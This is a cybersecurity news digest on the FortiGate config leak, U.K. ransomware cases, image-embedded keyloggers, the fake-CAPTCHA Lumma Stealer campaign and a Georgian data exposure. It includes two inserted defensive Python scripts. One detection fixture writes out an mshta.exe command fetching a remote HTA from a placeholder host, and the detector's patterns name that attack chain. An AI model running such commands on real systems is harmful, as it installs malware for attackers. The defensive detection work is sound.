MSP cybersecurity news digest, January 29, 2025

15,000+ FortiGate firewall configurations leaked by Belsen Group

A new leak from the threat actor group Belsen Group has exposed over 15,000 FortiGate firewall configurations. The data has been released for free on the attackers’ Tor website, allowing other threat actors to exploit it.

The data consists of a 1.6GB archive, sorted by country and IP address, that includes configuration dumps, firewall rules, private keys and VPN passwords, some stored in plain text. The countries most affected are the U.S., U.K., Poland and Belgium, followed by France, Spain, Malaysia, the Netherlands, Thailand and Saudi Arabia.

The Belsen Group claims the leaked data was collected in 2022 using a then zero-day vulnerability, CVE-2022-40684, which was exploited to steal device configurations and add rogue administrative accounts. Even if organizations patched the vulnerability in 2022, attackers may already have gained access before the fix was applied. The exposed private keys and digital certificates could enable unauthorized access or impersonation of affected devices in encrypted communications. To mitigate the risk, organizations should update credentials, audit firewall configurations, rotate compromised certificates and monitor networks for suspicious activity.
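The audit step above (looking for rogue administrative accounts and secrets stored in plain text) can be scripted against a configuration backup. The following is an added example, not code from the digest or from Fortinet; the config text is a constructed FortiOS-style sample, and the list of expected admin accounts is an assumption an organization would replace with its own.

```python
"""Audit a FortiGate-style configuration dump for unexpected admin accounts
and for secrets that are not stored in encrypted (ENC) form."""

# Constructed sample in FortiOS CLI style; it is not a real leaked config.
SAMPLE_CONFIG = """\
config system admin
    edit "admin"
        set accprofile "super_admin"
        set vdom "root"
        set password ENC AK1placeholder==
    next
    edit "unexpected-admin"
        set accprofile "super_admin"
        set vdom "root"
        set password ENC AK1placeholder2==
    next
end
config vpn ipsec phase1-interface
    edit "branch-tunnel"
        set psksecret MyPlainSharedSecret
    next
end
"""

EXPECTED_ADMINS = {"admin"}  # assumption: the organization's known admin accounts
SECRET_KEYS = ("password", "passwd", "psksecret")


def parse_entries(text):
    """Yield (section, entry_name, {key: value}) for each edit/next entry.
    Simplified: nested sub-blocks inside an entry are not tracked."""
    section, name, attrs = None, None, {}
    for line in text.splitlines():
        s = line.strip()
        if s.startswith("config "):
            section = s[len("config "):]
        elif s.startswith("edit "):
            name, attrs = s[len("edit "):].strip('"'), {}
        elif s.startswith("set ") and name is not None:
            key, _, value = s[len("set "):].partition(" ")
            attrs[key] = value.strip('"')
        elif s == "next" and name is not None:
            yield section, name, attrs
            name = None


def audit(text, expected_admins=EXPECTED_ADMINS):
    """Return findings: admin accounts outside the allowlist and any
    password/psksecret value not prefixed with 'ENC '."""
    findings = []
    for section, name, attrs in parse_entries(text):
        if section == "system admin" and name not in expected_admins:
            findings.append(f"rogue admin '{name}' ({attrs.get('accprofile')})")
        for key in SECRET_KEYS:
            if key in attrs and not attrs[key].startswith("ENC "):
                findings.append(f"plaintext {key} in {section}/{name}")
    return findings
```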

Two recent ransomware attacks in the U.K.

A ransomware attack forced Blacon High School in Chester, U.K., to shut down for at least two days, disrupting operations and leaving IT systems offline. While students continued coursework via Google Classroom, the school remained uncertain whether data had been breached, awaiting findings from cybersecurity specialists.

In a separate case, Gateshead Council in North East England was hit by the Medusa ransomware gang, which leaked 31 pages of stolen documents, exposing residents' and employees' personally identifiable information (PII). Medusa demanded $600,000 for data deletion.

The U.K. government is now considering a ban on ransom payments for public sector organizations and potentially extending restrictions to large private businesses.

In phishing campaigns, attackers are deploying VIP Keylogger and 0bj3ctivity Stealer malware hidden in images

Threat actors have been embedding malicious code in images to deliver malware such as VIP Keylogger and 0bj3ctivity Stealer through phishing campaigns.

Attackers uploaded these images to archive[.]org and used a .NET loader to install the final payloads. Victims were tricked into opening malicious Excel attachments that exploited a known vulnerability (CVE-2017-11882) to execute a VBScript, which then retrieved and decoded the malware. VIP Keylogger, deployed via this method, captures keystrokes, clipboard data, screenshots and credentials, sharing features with Snake Keylogger and 404 Keylogger.

Another campaign delivers malicious archive files via email, enticing victims to execute a JavaScript file that triggers a similar infection chain, ultimately installing 0bj3ctivity Stealer. The similarities suggest that cybercriminals are leveraging premade malware kits to streamline attacks and reduce the technical expertise required.

Lumma Stealer malware spread through fake CAPTCHA campaign targeting numerous industries

Researchers have uncovered a new malware campaign using fake CAPTCHA verification checks to spread the Lumma information stealer. The campaign is global, affecting victims in Argentina, Colombia, the U.S., the Philippines and other countries, with the telecom industry being the most targeted.

Attackers lure victims to compromised websites that display a fake CAPTCHA, instructing them to run a command that downloads and executes an HTA file via Windows' mshta.exe. This HTA file triggers a multistage PowerShell script designed to bypass Windows Antimalware Scan Interface (AMSI) and deploy Lumma. By using this method, attackers evade browser-based defenses, making detection and blocking more difficult.
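Because the chain above runs outside the browser, process-creation telemetry is where defenders can catch it: mshta.exe pulling an HTA from a URL, followed by PowerShell whose parent is mshta.exe. The following detection logic is an added example, not code from the digest or the cited researchers; the events are constructed, and the field names are an assumption (a Sysmon Event ID 1 export carries equivalent fields).

```python
"""Flag process-creation events matching the fake-CAPTCHA -> mshta.exe ->
PowerShell chain. Events and field names are constructed for this example."""
import ntpath

# Constructed process-creation events: pid, parent pid, image path, command line.
EVENTS = [
    {"pid": 4100, "ppid": 1200, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 4212, "ppid": 4100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://verify.example.invalid/captcha.hta"},
    {"pid": 4300, "ppid": 4212,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c <constructed stage-2 placeholder>"},
    # Benign-looking control case: a local HTA opened by mshta.exe directly.
    {"pid": 4400, "ppid": 1200, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\help.hta"},
]


def image_name(event):
    """Lower-cased file name of the executable, independent of its directory."""
    return ntpath.basename(event["image"]).lower()


def detect_fake_captcha_chain(events):
    """Return (pid, reason) alerts for:
      1. mshta.exe whose command line references an http(s) URL, and
      2. powershell.exe whose parent process is mshta.exe.
    A local .hta launched by mshta.exe alone is not flagged."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = image_name(e)
        cmd = e["cmdline"].lower()
        if name == "mshta.exe" and ("http://" in cmd or "https://" in cmd):
            alerts.append((e["pid"], "mshta.exe retrieving a remote HTA"))
        parent = by_pid.get(e["ppid"])
        if name == "powershell.exe" and parent and image_name(parent) == "mshta.exe":
            alerts.append((e["pid"], "PowerShell spawned by mshta.exe"))
    return alerts
```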

Lumma Stealer, a malware-as-a-service (MaaS) threat, has been actively distributed through various tactics, including nearly 1,000 fake domains mimicking Reddit and WeTransfer. Threat actors previously used a similar strategy with over 1,300 fake AnyDesk domains to spread Vidar Stealer malware. This discovery coincides with the emergence of an updated phishing-as-a-service (PhaaS) toolkit, Tycoon 2FA, which employs advanced evasion techniques to bypass security checks.

German cloud provider has exposed the sensitive data of the entire population of the country of Georgia

A German cloud service provider unintentionally exposed sensitive data, potentially affecting the entire population of Georgia, according to researchers.

The researchers traced the leak to an unprotected Elasticsearch instance hosted on a German cloud server, which was taken offline shortly after discovery. However, it remains unclear whether the company was notified, if threat actors accessed the data, or if it was exfiltrated elsewhere.

The exposed database contained millions of records, including personal details such as ID numbers, full names, birth dates, phone numbers and potentially insurance-related information. Some of the leaked data appears to be linked to a 2020 breach but was combined with additional records, including phone numbers and car owner details.